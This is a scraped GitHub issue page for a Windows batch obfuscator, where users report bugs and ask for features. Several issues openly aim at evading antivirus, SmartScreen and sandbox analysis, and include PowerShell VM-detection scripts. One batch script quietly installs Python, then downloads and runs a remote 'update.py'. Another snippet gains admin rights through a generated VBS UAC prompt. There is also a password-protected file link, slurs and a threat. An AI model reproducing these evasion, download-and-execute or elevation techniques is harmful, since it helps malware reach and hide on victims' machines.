kdot227 / somalifuscatorv2 Goto Github PK
View Code? Open in Web Editor NEWMost advanced and poorly coded windows batch obfuscator ever made (aka the best)
Home Page: https://sped.lol
License: Apache License 2.0
Most advanced and poorly coded windows batch obfuscator ever made (aka the best)
Home Page: https://sped.lol
License: Apache License 2.0
Explain below
yo pookie its shade add my tele https://t.me/Shade3421
I installed python in the path and when i run the setup.bat and when i press y or n it says
"please install python and add it to the path"
When I obsufacted to level 1, 2, 4 its always opening command prompt for milisecond and closing itself, Any ideas why this is happening?
Add Base64 with certutil and certs + add encode/decode hex with certutil (ez)
Describe the bug
After trying to obfuscate the simple batch file which create scheduled task, the output file is corupted and the cmd window showing parameter missed
To Reproduce
Steps to reproduce the behavior:
Expected behavior
A clear and concise description of what you expected to happen.
Screenshots
If applicable, add screenshots to help explain your problem.
Additional context
Add any other context about the problem here.
Explain below
Revert back to using task scheduler instead of reg keys cause reg keys auto ask for admin
i already installed winrar but its said winrar not installed when i set "true" for "smartscreen_bypass".
Process check: Check for VM-related processes
$ErrorActionPreference = 'Stop'
$url = 'https://raw.githubusercontent.com/A3ima/VmDetecter/main/Vms.txt'
try {
$vmProcesses = (Invoke-WebRequest -Uri $url -ErrorAction Stop).Content -split "`n" |
ForEach-Object { $_.Trim() } | Sort-Object -Unique
} catch {
Write-Host "Error fetching VM process list: $_" -ForegroundColor Red
exit
}
function Get-ParentProcessId {
param (
[Parameter(Mandatory = $true)]
[ValidateNotNull()]
[System.Diagnostics.Process] $process
)
(Get-WmiObject -Query "SELECT ParentProcessId FROM Win32_Process WHERE ProcessId = $($process.Id)").ParentProcessId
}
function Test-ParentProcess {
param (
[Parameter(Mandatory = $true)]
[ValidateNotNull()]
[System.Diagnostics.Process] $process,
[Parameter(Mandatory = $false)]
[string[]] $vmProcesses
)
if ($null -eq $vmProcesses -or $vmProcesses.Count -eq 0) {
return $null
}
$parentProcessId = Get-ParentProcessId -process $process
if ($null -ne $parentProcessId -and 0 -ne $parentProcessId -and $process.Id -ne $parentProcessId) {
$parentProcess = (Get-CimInstance -ClassName Win32_Process -Filter "ProcessId = $($parentProcessId)").Name
return $null -ne ($vmProcesses | Where-Object { $parentProcess -match $_ })
} else {
return $null
}
}
function Test-FilePath {
param (
[Parameter(Mandatory = $true)]
[ValidateNotNull()]
[System.Diagnostics.Process] $process,
[Parameter(Mandatory = $false)]
[string[]] $vmProcesses
)
if ($null -eq $vmProcesses -or $vmProcesses.Count -eq 0) {
return $null
}
$filePath = $process.MainModule.FileName
return $null -ne ($vmProcesses | Where-Object { $filePath -match ".*\\.*$_.*" })
}
function Test-VMProcesses {
param ([string[]] $vmProcesses)
$foundProcesses = @{}
foreach ($vmProcess in $vmProcesses) {
try {
$processes = Get-Process -ErrorAction Stop | Where-Object { $_.ProcessName -match $vmProcess }
if ($processes) {
foreach ($singleProcess in $processes) {
if ($vmProcesses -contains $singleProcess.ProcessName) {
$foundProcesses[$singleProcess.Name] = $true
}
}
}
} catch {}
}
return $foundProcesses.Keys
}
try {
$foundVMProcesses = Test-VMProcesses -vmProcesses $vmProcesses
if ($foundVMProcesses) {
Write-Host "VM-related processes detected:" -ForegroundColor Yellow
foreach ($processName in $foundVMProcesses) {
$process = Get-Process -Name $processName -ErrorAction SilentlyContinue
if ($process) {
$hasVmParent = Test-ParentProcess -process $process -vmProcesses $vmProcesses
$hasVmFilePath = Test-FilePath -process $process -vmProcesses $vmProcesses
if ($hasVmParent) {
Write-Host "Process: $processName (VM-related parent detected)" -ForegroundColor Yellow
} elseif ($hasVmFilePath) {
Write-Host "Process: $processName (VM-related file path detected)" -ForegroundColor Yellow
} else {
Write-Host "Process: $processName" -ForegroundColor Yellow
}
}
}
} else {
Write-Host "No VM-related processes detected." -ForegroundColor Green
}
} catch {
Write-Host "An unexpected error occurred: $_" -ForegroundColor Red
} finally {
if ($foundVMProcesses) {
Write-Host "Script completed with VM detected." -ForegroundColor Yellow
} else {
Write-Host "Script completed without detecting a VM." -ForegroundColor Green
}
}
Read-Host -Prompt "Press Enter to exit"
Hey! I'm writing this bug report to say that it is awesome, But there is one issue that stopped me from using it.
No runtime errors in your code, Nothing wrong with your code except the obfuscation part.
I tried to use your python script to obfuscate my program, But there was one issue.
Lag. Lots of lag. Way too much lag. Seconds to load one single "echo Welcome to Endless Clicker!"
My computer has very powerful hardware that is way more than enough to run a batch script.
I tried many settings in the "src\settings.json" but it would not let me.
There was also many errors that look to be related to Powershell.
Please fix this issue.
--- My Computer Hardware ---
CPU: Intel(R) Core(TM) i7 - 10700 CPU @ 2.90GHz
Ram: DDR3 32GB of RAM
GPU: NVIDIA Geforce GTX 1660
Network Type: Ethernet
Disk: 512GB
Windows
Traceback (most recent call last):
File "C:\Users\User\Downloads\Important\Obfuscators\Somalifuscator-main\main.py", line 75, in
import BatchParse
ModuleNotFoundError: No module named 'BatchParse'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\User\Downloads\Important\Obfuscators\Somalifuscator-main\main.py", line 83, in
e
TypeError: unsupported operand type(s) for +: 'ModuleNotFoundError' and 'str'
echo + variable
pause
hey
here is my batch code, ive tried many and yet no success, it always throws some weird error in every batch code
my code:
@echo off
cd /D %temp%
where python >nul 2>&1
if %errorlevel%==0 (
echo Python is installed
) else (
for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j
if "%VERSION%"=="6.1" (
echo Installing Python 3.8 for Windows 7
powershell -Command "Invoke-WebRequest -Uri 'https://www.python.org/ftp/python/3.8.0/python-3.8.0.exe' -OutFile 'python-3.8.0.exe'"
start /wait python-3.8.0.exe /quiet InstallAllUsers=1 PrependPath=1
del python-3.8.0.exe
) else (
echo Installing Python 3.12
powershell -Command "Invoke-WebRequest -Uri 'https://www.python.org/ftp/python/3.12.0/python-3.12.0-amd64.exe' -OutFile 'python-3.12.0-amd64.exe'"
start /wait python-3.12.0-amd64.exe /quiet InstallAllUsers=1 PrependPath=1
del python-3.12.0-amd64.exe
)
)
set URL="link"
powershell.exe -Command (new-object System.Net.WebClient).DownloadFile('%URL%','update.py')
python update.py
try filling url wirth any link and see the resaults
and a simple tutorial wouldn't be bad at all too
Please upload the original version as some of the functions do not work exactly as described ๐ฅ
fix regex for labels with "(?<=\s|^):[^\s:]+"
Add ASSOC and other commands that are able to be expanded via for
I've tried using SomalifuscatorV2 with another script of yours, Bat2Exe, but it seems it's not working. Is there a way to use both at the same time? Thanks for creating two awesome things.
%%A and other stuff like that is prolly broken af but ill fix when im home
Explain below
Explain below
yo ur discord link has expired, and btw are u interested in making a crypter?
Hi really nice code, it works pretty fine for bat files but it's still quite obious that it's a virus or something specially when the cmd pops up.
so any way to make the cmd console hidden and not poping up as well changing the bat file to exe without flaring any antivurs flag?
https://mega.nz/folder/uQYHTYpI
Password : SD-RGYlgOBL7c8_nbKfHwQ
brazenly stole half the functionality from my obfuscator, without even indicating the author ๐คก
How do i obfuscate EXE or PS1 files it only lets me obfuscate batch files
Is your feature request related to a problem? Please describe.
I made a batch script, its take a screenshot of the computer BUT its use powershell and the grabber completly break my powershell code :/
Describe the solution you'd like
Add an "Powershell code finder" and obfuscate the powershell code diferaly as the BatchCode
Describe alternatives you've considered
For the Powershell obfuscation you can use this ! [https://github.com/JoelGMSec/Invoke-Stealth]
Additional context
https://github.com/JoelGMSec/Invoke-Stealth
Add array listing for level 1 and ran1
ahhhh not another skid
1.) Fix dead code
2.) Add 0x150 suggestion
3.) Fix speed issue
4.) Dead labels
5.) Label args
6.) Fix small bug issues with ultimate
Explain below
When I tried to obfuscate the batch file dan enable the debug mode, not all the command line being deobfuscated perfectly, each time there is random garbage on it and only got perfectly deobfuscated like once out of 5 to 10 times of obfuscation so the obfuscator is working with enough tries.
When I tried to run the test_all.py this is the result I got, can someone @KDot227 help me to point up the problem and resolve the issue? Thanks
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโณโโโโโโโโโโโโโโโโโโโโโโโโโณโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ File Name โ Level โ Difference โ
โกโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฉ
โ C:\Users\1234567\Desktop\SomalifuscatorV2-mโฆ โ Obfuscated Incorrectly โ --- โ
โ โ โ +++ โ
โ โ โ @@ -1,2 +1 @@ โ
โ โ โ -Administrative permissions required. โ
โ โ โ Detecting permissions... โ
โ โ โ -Success: Administrative permissions โ
โ โ โ confirmed. โ
โ โ โ +Administrati~-2,1%l%pJbfzLw%BYKxW%COMMONPRโฆ โ
โ C:\Users\1234567\Desktop\SomalifuscatorV2-mโฆ โ Obfuscated Incorrectly โ --- โ
โ โ โ +++ โ
โ โ โ @@ -1,100 +0,0 @@ โ
โ โ โ -1 โ
โ โ โ -2 โ
โ โ โ -3 โ
โ โ โ -4 โ
โ โ โ -5 โ
โ โ โ -6 โ
โ โ โ -7 โ
โ โ โ -8 โ
โ โ โ -9 โ
โ โ โ -10 โ
โ โ โ -11 โ
โ โ โ -12 โ
โ โ โ -13 โ
โ โ โ -14 โ
โ โ โ -15 โ
โ โ โ -16 โ
โ โ โ -17 โ
โ โ โ -18 โ
โ โ โ -19 โ
โ โ โ -20 โ
โ โ โ -21 โ
โ โ โ -22 โ
โ โ โ -23 โ
โ โ โ -24 โ
โ โ โ -25 โ
โ โ โ -26 โ
โ โ โ -27 โ
โ โ โ -28 โ
โ โ โ -29 โ
โ โ โ -30 โ
โ โ โ -31 โ
โ โ โ -32 โ
โ โ โ -33 โ
โ โ โ -34 โ
โ โ โ -35 โ
โ โ โ -36 โ
โ โ โ -37 โ
โ โ โ -38 โ
โ โ โ -39 โ
โ โ โ -40 โ
โ โ โ -41 โ
โ โ โ -42 โ
โ โ โ -43 โ
โ โ โ -44 โ
โ โ โ -45 โ
โ โ โ -46 โ
โ โ โ -47 โ
โ โ โ -48 โ
โ โ โ -49 โ
โ โ โ -50 โ
โ โ โ -51 โ
โ โ โ -52 โ
โ โ โ -53 โ
โ โ โ -54 โ
โ โ โ -55 โ
โ โ โ -56 โ
โ โ โ -57 โ
โ โ โ -58 โ
โ โ โ -59 โ
โ โ โ -60 โ
โ โ โ -61 โ
โ โ โ -62 โ
โ โ โ -63 โ
โ โ โ -64 โ
โ โ โ -65 โ
โ โ โ -66 โ
โ โ โ -67 โ
โ โ โ -68 โ
โ โ โ -69 โ
โ โ โ -70 โ
โ โ โ -71 โ
โ โ โ -72 โ
โ โ โ -73 โ
โ โ โ -74 โ
โ โ โ -75 โ
โ โ โ -76 โ
โ โ โ -77 โ
โ โ โ -78 โ
โ โ โ -79 โ
โ โ โ -80 โ
โ โ โ -81 โ
โ โ โ -82 โ
โ โ โ -83 โ
โ โ โ -84 โ
โ โ โ -85 โ
โ โ โ -86 โ
โ โ โ -87 โ
โ โ โ -88 โ
โ โ โ -89 โ
โ โ โ -90 โ
โ โ โ -91 โ
โ โ โ -92 โ
โ โ โ -93 โ
โ โ โ -94 โ
โ โ โ -95 โ
โ โ โ -96 โ
โ โ โ -97 โ
โ โ โ -98 โ
โ โ โ -99 โ
โ โ โ -100 โ
โ C:\Users\1234567\Desktop\SomalifuscatorV2-mโฆ โ Obfuscated Correctly โ NONE โ
โ C:\Users\1234567\Desktop\SomalifuscatorV2-mโฆ โ Obfuscated Incorrectly โ --- โ
โ โ โ +++ โ
โ โ โ @@ -1,2 +0,0 @@ โ
โ โ โ -this is a test โ
โ โ โ -C:\Users\1234567\Desktop\SomalifuscatorV2-โฆ โ
โ C:\Users\1234567\Desktop\SomalifuscatorV2-mโฆ โ Obfuscated Correctly โ NONE โ
โ C:\Users\1234567\Desktop\SomalifuscatorV2-mโฆ โ Obfuscated Correctly โ NONE โ
โ C:\Users\1234567\Desktop\SomalifuscatorV2-mโฆ โ Obfuscated Correctly โ NONE โ
โ C:\Users\1234567\Desktop\SomalifuscatorV2-mโฆ โ Obfuscated Incorrectly โ --- โ
โ โ โ +++ โ
โ โ โ @@ -1,3 +1,3 @@ โ
โ โ โ this is a test โ
โ โ โ C:\Users\1234567\Desktop\SomalifuscatorV2-โฆ โ
โ โ โ -worked โ
โ โ โ +wo~-4,1%u%L(IrtI%USERPROFILE:~5,1%OS:~-7,1 โ
โ C:\Users\1234567\Desktop\SomalifuscatorV2-mโฆ โ Obfuscated Incorrectly โ --- โ
โ โ โ +++ โ
โ โ โ @@ -11,5 +11,3 @@ โ
โ โ โ 0123456789abcdefghijklmnopqrstuvwxyzABCDEFโฆ โ
โ โ โ 0123456789abcdefghijklmnopqrstuvwxyzABCDEFโฆ โ
โ โ โ 0123456789abcdefghijklmnopqrstuvwxyzABCDEFโฆ โ
โ โ โ -0123456789abcdefghijklmnopqrstuvwxyzABCDEFโฆ โ
โ โ โ -0123456789abcdefghijklmnopqrstuvwxyzABCDEFโฆ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Failed
12.99749860027805
Describe the bug
A clear and concise description of what the bug is.
To Reproduce
Steps to reproduce the behavior:
Expected behavior
A clear and concise description of what you expected to happen.
Screenshots
If applicable, add screenshots to help explain your problem.
Additional context
Add any other context about the problem here.
Remove carrot from ran2
i made a simple deobfuscator works on the default settings
import re, codecs, base64, sys
with open(sys.argv[1], 'r') as file:
filedata = file.read()
filedata = ''.join([char for char in filedata if ord(char) < 128])
shit1 = set(re.findall(r'%.*?%', filedata))
for shit2 in shit1:
shit3 = filedata.count(shit2)
if shit3 == 1:
filedata = filedata.replace(shit2, '')
niggaxd = re.findall(r'powershell\.exe -ep bypass -noni -nop -e ([A-Za-z0-9+/=]+)', filedata)[0]
with open('output.txt', 'w') as file:
file.write(codecs.decode(base64.b64decode(niggaxd.encode()), 'utf-16', 'ignore'))
the output : output.txt
Bestie,
plz ur discord or some shi or ill beat your catholic ass ๐ญ
I tried with every single combination in the settings, but it's kinda bugged, 96% of the times it breaks the code, any fix?
Describe the bug
I use this code to get administrator privilege
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if "%errorlevel%" NEQ "0" (
echo: Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo: UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs" & exit
)
But the window pops up for about 3 seconds then disappears
.
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "function Get-Entropy{param([string]`$inputString);`$frequencyTable=@{};`$stringLength=`$inputString.Length;foreach(`$char in `$inputString.ToCharArray()){if(`$frequencyTable.ContainsKey(`$char)){`$frequencyTable[`$char]++}else{`$frequencyTable[`$char]=1}};`$entropy=0;foreach(`$value in `$frequencyTable.Values){`$frequency=`$value/`$stringLength;`$entropy-=`$frequency*[Math]::Log(`$frequency,2)};return `$entropy};`$bios=Get-WmiObject -Class Win32_BIOS;`$computer=Get-WmiObject -Class Win32_ComputerSystem;`$vm_bios_list=@('VMware, Inc.','Xen','VirtualBox','QEMU','Microsoft Corporation','KVM','Bochs','Parallels','Oracle VM VirtualBox','Red Hat','SeaBIOS','innotek GmbH','Amazon EC2','Hyper-V','Citrix','Virtuozzo','bhyve','Nutanix','Proxmox','Virtual Iron','VMware7,1','Virtual Machine');`$suspicious_bios_list=@('Default','To be filled by O.E.M.','Not available','Unknown','System manufacturer','TBD by OEM','O.E.M.','OEM','N/A','Not Specified','System Product Name','System','System Version','OEM Manufacturer','OEM Product','OEM Serial');`$suspicious_versions=@('VRTUAL - 1', 'INTEL - 1', 'A M I - 9000906','Phoenix Technologies LTD','Award Software, Inc.','AMI BIOS','Insyde Software','Laptop','Desktop','Tablet');`$suspicious_dates=@('01/01/2000', '02/02/2002','01/01/1970','12/31/1999','01/02/2000','01/01/2010','01/01/2015');if(`$null -eq `$bios -or `$null -eq `$computer){Write-Host 'WMI Query Failed. Possible attempt to hide VM.';exit 1};if(`$bios.Manufacturer -ne `$computer.Manufacturer){Write-Host 'Inconsistent BIOS and System Manufacturer. Possible attempt to hide VM.';exit 1};if(`$vm_bios_list -contains `$bios.Manufacturer -or `$suspicious_versions -contains `$bios.BIOSVersion -or `$suspicious_dates -contains `$bios.ReleaseDate){Write-Host ('Virtual Machine Detected. BIOS Information: '+`$bios.Manufacturer+' '+`$bios.BIOSVersion+' '+`$bios.ReleaseDate);exit 1};if(`$suspicious_bios_list -contains `$bios.Manufacturer){Write-Host ('Suspicious BIOS Manufacturer Detected. BIOS Manufacturer: '+`$bios.Manufacturer);exit 1};`$entropy=Get-Entropy -inputString `$bios.SerialNumber;if(`$entropy -lt 1){Write-Host 'Low Entropy Detected in BIOS Serial Number. Possible attempt to hide VM.';exit 1};if([string]::IsNullOrEmpty(`$bios.Manufacturer) -or [string]::IsNullOrEmpty(`$bios.BIOSVersion) -or [string]::IsNullOrEmpty(`$bios.ReleaseDate)){Write-Host 'Missing BIOS Information. Possible attempt to hide VM.';exit 1}else{Write-Host ('No Virtual Machine Detected. BIOS Information: '+`$bios.Manufacturer+' '+`$bios.BIOSVersion+' '+`$bios.ReleaseDate);exit 0}"
what happend to cheataway my guy ? everyone is either banned or dissapeared
Add UTF-8 Anti Change function with labels. Remove obf_oneline class/function and have all batch code obfuscated at one time.
running the setup.bat file
Traceback (most recent call last):
File "C:\Users\Potato\AppData\Local\Programs\Python\Python37\lib\runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "C:\Users\Potato\AppData\Local\Programs\Python\Python37\lib\runpy.py", line 85, in _run_code
exec(code, run_globals)
File "C:\Users\Potato\Downloads\Compressed\SomalifuscatorV2-main\src\main.py", line 7, in <module>
from util.ui.ui import Ui, UiLinux
File "C:\Users\Potato\Downloads\Compressed\SomalifuscatorV2-main\src\util\ui\ui.py", line 6, in <module>
from util.methods.common.common import console
File "C:\Users\Potato\Downloads\Compressed\SomalifuscatorV2-main\src\util\methods\common\common.py", line 74
return "^" if (ran := random.choice([True, False])) else ""
^
SyntaxError: invalid syntax
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.